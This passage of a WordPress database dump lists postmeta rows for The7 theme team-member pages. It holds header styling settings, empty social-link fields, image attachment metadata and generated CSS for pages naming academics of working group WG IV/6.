(14166,2824,'_dt_teammate_options_rss',''),
(14167,2824,'_dt_teammate_options_delicious',''),
(14168,2824,'_dt_teammate_options_flickr',''),
(14169,2824,'_dt_teammate_options_lastfm',''),
(14170,2824,'_dt_teammate_options_linkedin',''),
(14171,2824,'_dt_teammate_options_vimeo',''),
(14172,2824,'_dt_teammate_options_tumbler',''),
(14173,2824,'_dt_teammate_options_pinterest',''),
(14174,2824,'_dt_teammate_options_devian',''),
(14175,2824,'_dt_teammate_options_skype',''),
(14176,2824,'_dt_teammate_options_github',''),
(14177,2824,'_dt_teammate_options_instagram',''),
(14178,2824,'_dt_teammate_options_stumbleupon',''),
(14179,2824,'_dt_teammate_options_behance',''),
(14180,2824,'_dt_teammate_options_px-500',''),
(14181,2824,'_dt_teammate_options_tripedvisor',''),
(14182,2824,'_dt_teammate_options_vk',''),
(14183,2824,'_dt_teammate_options_foursquare',''),
(14184,2824,'_dt_teammate_options_xing',''),
(14185,2824,'_dt_teammate_options_weibo',''),
(14186,2824,'_dt_teammate_options_odnoklassniki',''),
(14187,2824,'_dt_teammate_options_research-gate',''),
(14188,2824,'_dt_teammate_options_yelp',''),
(14189,2824,'_dt_teammate_options_blogger',''),
(14190,2824,'_dt_teammate_options_soundcloud',''),
(14191,2824,'_dt_teammate_options_viber',''),
(14192,2824,'_dt_teammate_options_whatsapp',''),
(14193,2824,'_dt_teammate_options_reddit',''),
(14194,2824,'_dt_teammate_options_snapchat',''),
(14195,2824,'_dt_teammate_options_telegram',''),
(14196,2824,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(14197,2826,'_edit_lock','1665767368:1'),
(14198,2827,'_wp_attached_file','2022/10/w135.jpg'),
(14199,2827,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:114;s:6:\"height\";i:135;s:4:\"file\";s:16:\"2022/10/w135.jpg\";s:8:\"filesize\";i:25315;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14200,2826,'_thumbnail_id','2827'),
(14201,2826,'_edit_last','1'),
(14202,2826,'_dt_sidebar_position','disabled'),
(14203,2826,'_dt_sidebar_widgetarea_id','sidebar_1'),
(14204,2826,'_dt_sidebar_hide_on_mobile','0'),
(14205,2826,'_dt_footer_show','1'),
(14206,2826,'_dt_footer_widgetarea_id','sidebar_2'),
(14207,2826,'_dt_footer_hide_on_mobile','0'),
(14208,2826,'_dt_header_title','fancy'),
(14209,2826,'_dt_header_background','normal'),
(14210,2826,'_dt_header_background_below_slideshow','disabled'),
(14211,2826,'_dt_header_transparent_bg_color_scheme','light'),
(14212,2826,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(14213,2826,'_dt_header_transparent_top_bar_bg_opacity','25'),
(14214,2826,'_dt_header_transparent_bg_color','#000000'),
(14215,2826,'_dt_header_transparent_bg_opacity','50'),
(14216,2826,'_dt_header_disabled_background','normal'),
(14217,2826,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(14218,2826,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(14219,2826,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(14220,2826,'_dt_header_disabled_transparent_bg_color','#000000'),
(14221,2826,'_dt_header_disabled_transparent_bg_opacity','50'),
(14222,2826,'_dt_page_overrides_top_margin',''),
(14223,2826,'_dt_page_overrides_right_margin',''),
(14224,2826,'_dt_page_overrides_bottom_margin',''),
(14225,2826,'_dt_page_overrides_left_margin',''),
(14226,2826,'_dt_mobile_page_padding_top',''),
(14227,2826,'_dt_mobile_page_padding_right',''),
(14228,2826,'_dt_mobile_page_padding_bottom',''),
(14229,2826,'_dt_mobile_page_padding_left',''),
(14230,2826,'_dt_fancy_header_layout_heading',''),
(14231,2826,'_dt_fancy_header_title_aligment','center'),
(14232,2826,'_dt_fancy_header_height','300'),
(14233,2826,'_dt_fancy_header_padding-top','0px'),
(14234,2826,'_dt_fancy_header_padding-bottom','0px'),
(14235,2826,'_dt_fancy_header_breadcrumbs_heading',''),
(14236,2826,'_dt_fancy_header_breadcrumbs','enabled'),
(14237,2826,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(14238,2826,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(14239,2826,'_dt_fancy_header_title_heading',''),
(14240,2826,'_dt_fancy_header_title_mode','custom'),
(14241,2826,'_dt_fancy_header_title','Dr. Yair Grinberger Hebrew University of Jerusalem, Israel (WG IV/6)'),
(14242,2826,'_dt_fancy_header_title_font_size','30'),
(14243,2826,'_dt_fancy_header_title_line_height','36'),
(14244,2826,'_dt_fancy_header_text_transform','none'),
(14245,2826,'_dt_fancy_header_title_color_mode','color'),
(14246,2826,'_dt_fancy_header_title_color','#ffffff'),
(14247,2826,'_dt_fancy_header_subtitle_heading',''),
(14248,2826,'_dt_fancy_header_subtitle',''),
(14249,2826,'_dt_fancy_header_subtitle_font_size','18'),
(14250,2826,'_dt_fancy_header_subtitle_line_height','26'),
(14251,2826,'_dt_fancy_header_subtitle_text_transform','none'),
(14252,2826,'_dt_fancy_header_subtitle_color_mode','color'),
(14253,2826,'_dt_fancy_header_subtitle_color','#ffffff'),
(14254,2826,'_dt_fancy_header_bg_heading',''),
(14255,2826,'_dt_fancy_header_bg_color','#222222'),
(14256,2826,'_dt_fancy_header_bg_image_origin','custom'),
(14257,2826,'_dt_fancy_header_bg_image','a:0:{}'),
(14258,2826,'_dt_fancy_header_bg_repeat','no-repeat'),
(14259,2826,'_dt_fancy_header_bg_position_x','center'),
(14260,2826,'_dt_fancy_header_bg_position_y','center'),
(14261,2826,'_dt_fancy_header_bg_fullscreen','1'),
(14262,2826,'_dt_fancy_header_bg_overlay','0'),
(14263,2826,'_dt_fancy_header_overlay_color','#000'),
(14264,2826,'_dt_fancy_header_bg_overlay_opacity','50'),
(14265,2826,'_dt_fancy_header_scroll_effect','default'),
(14266,2826,'_dt_fancy_header_bg_parallax','0.5'),
(14267,2826,'_dt_fancy_header_responsiveness_heading',''),
(14268,2826,'_dt_fancy_header_responsiveness','enabled'),
(14269,2826,'_dt_fancy_header_responsiveness_switch','778px'),
(14270,2826,'_dt_fancy_header_responsive_height','70'),
(14271,2826,'_dt_fancy_header_responsive_font_size','30'),
(14272,2826,'_dt_fancy_header_responsive_title_line_height','38'),
(14273,2826,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(14274,2826,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(14275,2826,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(14276,2826,'_dt_teammate_options_go_to_single','1'),
(14277,2826,'_dt_teammate_options_position',''),
(14278,2826,'_dt_teammate_options_website',''),
(14279,2826,'_dt_teammate_options_mail',''),
(14280,2826,'_dt_teammate_options_facebook',''),
(14281,2826,'_dt_teammate_options_twitter',''),
(14282,2826,'_dt_teammate_options_dribbble',''),
(14283,2826,'_dt_teammate_options_you-tube',''),
(14284,2826,'_dt_teammate_options_rss',''),
(14285,2826,'_dt_teammate_options_delicious',''),
(14286,2826,'_dt_teammate_options_flickr',''),
(14287,2826,'_dt_teammate_options_lastfm',''),
(14288,2826,'_dt_teammate_options_linkedin',''),
(14289,2826,'_dt_teammate_options_vimeo',''),
(14290,2826,'_dt_teammate_options_tumbler',''),
(14291,2826,'_dt_teammate_options_pinterest',''),
(14292,2826,'_dt_teammate_options_devian',''),
(14293,2826,'_dt_teammate_options_skype',''),
(14294,2826,'_dt_teammate_options_github',''),
(14295,2826,'_dt_teammate_options_instagram',''),
(14296,2826,'_dt_teammate_options_stumbleupon',''),
(14297,2826,'_dt_teammate_options_behance',''),
(14298,2826,'_dt_teammate_options_px-500',''),
(14299,2826,'_dt_teammate_options_tripedvisor',''),
(14300,2826,'_dt_teammate_options_vk',''),
(14301,2826,'_dt_teammate_options_foursquare',''),
(14302,2826,'_dt_teammate_options_xing',''),
(14303,2826,'_dt_teammate_options_weibo',''),
(14304,2826,'_dt_teammate_options_odnoklassniki',''),
(14305,2826,'_dt_teammate_options_research-gate',''),
(14306,2826,'_dt_teammate_options_yelp',''),
(14307,2826,'_dt_teammate_options_blogger',''),
(14308,2826,'_dt_teammate_options_soundcloud',''),
(14309,2826,'_dt_teammate_options_viber',''),
(14310,2826,'_dt_teammate_options_whatsapp',''),
(14311,2826,'_dt_teammate_options_reddit',''),
(14312,2826,'_dt_teammate_options_snapchat',''),
(14313,2826,'_dt_teammate_options_telegram',''),
(14314,2826,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(14315,2828,'_edit_lock','1673099519:1'),
(14316,2829,'_wp_attached_file','2022/10/w13s.jpg'),
(14317,2829,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:122;s:6:\"height\";i:134;s:4:\"file\";s:16:\"2022/10/w13s.jpg\";s:8:\"filesize\";i:25712;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(14318,2828,'_thumbnail_id','2829'),
(14319,2828,'_edit_last','1'),
(14320,2828,'_dt_sidebar_position','right'),
(14321,2828,'_dt_sidebar_widgetarea_id','sidebar_1'),
(14322,2828,'_dt_sidebar_hide_on_mobile','0'),
(14323,2828,'_dt_footer_show','1'),
(14324,2828,'_dt_footer_widgetarea_id','sidebar_2'),
(14325,2828,'_dt_footer_hide_on_mobile','0'),
(14326,2828,'_dt_header_title','fancy'),
(14327,2828,'_dt_header_background','normal'),
(14328,2828,'_dt_header_background_below_slideshow','disabled'),
(14329,2828,'_dt_header_transparent_bg_color_scheme','light'),
(14330,2828,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(14331,2828,'_dt_header_transparent_top_bar_bg_opacity','25'),
(14332,2828,'_dt_header_transparent_bg_color','#000000'),
(14333,2828,'_dt_header_transparent_bg_opacity','50'),
(14334,2828,'_dt_header_disabled_background','normal'),
(14335,2828,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(14336,2828,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(14337,2828,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(14338,2828,'_dt_header_disabled_transparent_bg_color','#000000'),
(14339,2828,'_dt_header_disabled_transparent_bg_opacity','50'),
(14340,2828,'_dt_page_overrides_top_margin',''),
(14341,2828,'_dt_page_overrides_right_margin',''),
(14342,2828,'_dt_page_overrides_bottom_margin',''),
(14343,2828,'_dt_page_overrides_left_margin',''),
(14344,2828,'_dt_mobile_page_padding_top',''),
(14345,2828,'_dt_mobile_page_padding_right',''),
(14346,2828,'_dt_mobile_page_padding_bottom',''),
(14347,2828,'_dt_mobile_page_padding_left',''),
(14348,2828,'_dt_fancy_header_layout_heading',''),
(14349,2828,'_dt_fancy_header_title_aligment','center'),
(14350,2828,'_dt_fancy_header_height','300'),
(14351,2828,'_dt_fancy_header_padding-top','0px'),
(14352,2828,'_dt_fancy_header_padding-bottom','0px'),
(14353,2828,'_dt_fancy_header_breadcrumbs_heading',''),
(14354,2828,'_dt_fancy_header_breadcrumbs','enabled'),
(14355,2828,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(14356,2828,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(14357,2828,'_dt_fancy_header_title_heading',''),
(14358,2828,'_dt_fancy_header_title_mode','custom'),
(14359,2828,'_dt_fancy_header_title','Hao Li Technical University of Munich, Germany (WG IV/6)'),
(14360,2828,'_dt_fancy_header_title_font_size','30'),
(14361,2828,'_dt_fancy_header_title_line_height','36'),
(14362,2828,'_dt_fancy_header_text_transform','none'),
(14363,2828,'_dt_fancy_header_title_color_mode','color'),
(14364,2828,'_dt_fancy_header_title_color','#ffffff'),
(14365,2828,'_dt_fancy_header_subtitle_heading',''),
(14366,2828,'_dt_fancy_header_subtitle',''),
(14367,2828,'_dt_fancy_header_subtitle_font_size','18'),
(14368,2828,'_dt_fancy_header_subtitle_line_height','26'),
(14369,2828,'_dt_fancy_header_subtitle_text_transform','none'),
(14370,2828,'_dt_fancy_header_subtitle_color_mode','color'),
(14371,2828,'_dt_fancy_header_subtitle_color','#ffffff'),
(14372,2828,'_dt_fancy_header_bg_heading',''),
(14373,2828,'_dt_fancy_header_bg_color','#222222'),
(14374,2828,'_dt_fancy_header_bg_image_origin','custom'),
(14375,2828,'_dt_fancy_header_bg_image','a:0:{}'),
(14376,2828,'_dt_fancy_header_bg_repeat','no-repeat'),
(14377,2828,'_dt_fancy_header_bg_position_x','center'),
(14378,2828,'_dt_fancy_header_bg_position_y','center'),
(14379,2828,'_dt_fancy_header_bg_fullscreen','1'),
(14380,2828,'_dt_fancy_header_bg_overlay','0'),
(14381,2828,'_dt_fancy_header_overlay_color','#000'),
(14382,2828,'_dt_fancy_header_bg_overlay_opacity','50'),
(14383,2828,'_dt_fancy_header_scroll_effect','default'),
(14384,2828,'_dt_fancy_header_bg_parallax','0.5'),
(14385,2828,'_dt_fancy_header_responsiveness_heading',''),
(14386,2828,'_dt_fancy_header_responsiveness','enabled'),
(14387,2828,'_dt_fancy_header_responsiveness_switch','778px'),
(14388,2828,'_dt_fancy_header_responsive_height','70'),
(14389,2828,'_dt_fancy_header_responsive_font_size','30'),
(14390,2828,'_dt_fancy_header_responsive_title_line_height','38'),
(14391,2828,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(14392,2828,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(14393,2828,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(14394,2828,'_dt_teammate_options_go_to_single','1'),
(14395,2828,'_dt_teammate_options_position',''),
(14396,2828,'_dt_teammate_options_website',''),
(14397,2828,'_dt_teammate_options_mail',''),
(14398,2828,'_dt_teammate_options_facebook',''),
(14399,2828,'_dt_teammate_options_twitter',''),
(14400,2828,'_dt_teammate_options_dribbble',''),
(14401,2828,'_dt_teammate_options_you-tube',''),
(14402,2828,'_dt_teammate_options_rss',''),
(14403,2828,'_dt_teammate_options_delicious',''),
(14404,2828,'_dt_teammate_options_flickr',''),
(14405,2828,'_dt_teammate_options_lastfm',''),
(14406,2828,'_dt_teammate_options_linkedin',''),
(14407,2828,'_dt_teammate_options_vimeo',''),
(14408,2828,'_dt_teammate_options_tumbler',''),
(14409,2828,'_dt_teammate_options_pinterest',''),
(14410,2828,'_dt_teammate_options_devian',''),
(14411,2828,'_dt_teammate_options_skype',''),
(14412,2828,'_dt_teammate_options_github',''),
(14413,2828,'_dt_teammate_options_instagram',''),
(14414,2828,'_dt_teammate_options_stumbleupon',''),
(14415,2828,'_dt_teammate_options_behance',''),
(14416,2828,'_dt_teammate_options_px-500',''),
(14417,2828,'_dt_teammate_options_tripedvisor',''),
(14418,2828,'_dt_teammate_options_vk',''),
(14419,2828,'_dt_teammate_options_foursquare',''),
(14420,2828,'_dt_teammate_options_xing',''),
(14421,2828,'_dt_teammate_options_weibo',''),
(14422,2828,'_dt_teammate_options_odnoklassniki',''),
(14423,2828,'_dt_teammate_options_research-gate',''),
(14424,2828,'_dt_teammate_options_yelp',''),
(14425,2828,'_dt_teammate_options_blogger',''),
(14426,2828,'_dt_teammate_options_soundcloud',''),
(14427,2828,'_dt_teammate_options_viber',''),
(14428,2828,'_dt_teammate_options_whatsapp',''),
(14429,2828,'_dt_teammate_options_reddit',''),
(14430,2828,'_dt_teammate_options_snapchat',''),
(14431,2828,'_dt_teammate_options_telegram',''),
(14432,2828,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(14433,2818,'rs_page_bg_color',''),
(14434,2820,'rs_page_bg_color',''),
(14435,2822,'rs_page_bg_color',''),
(14436,2824,'rs_page_bg_color',''),
(14437,2826,'rs_page_bg_color',''),
(14438,2828,'rs_page_bg_color',''),
(14439,2791,'the7_shortcodes_dynamic_css','a:1:{s:32:\"1d5ed51a16e80dbf9b27c929ed73c0e2\";s:6837:\".dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2  .team-media img {\n  max-width: 120px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .dt-css-grid .team-media img {\n  width: 120px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-1d5ed51a16e80dbf9b27c929ed73c0e2.resize-by-browser-width 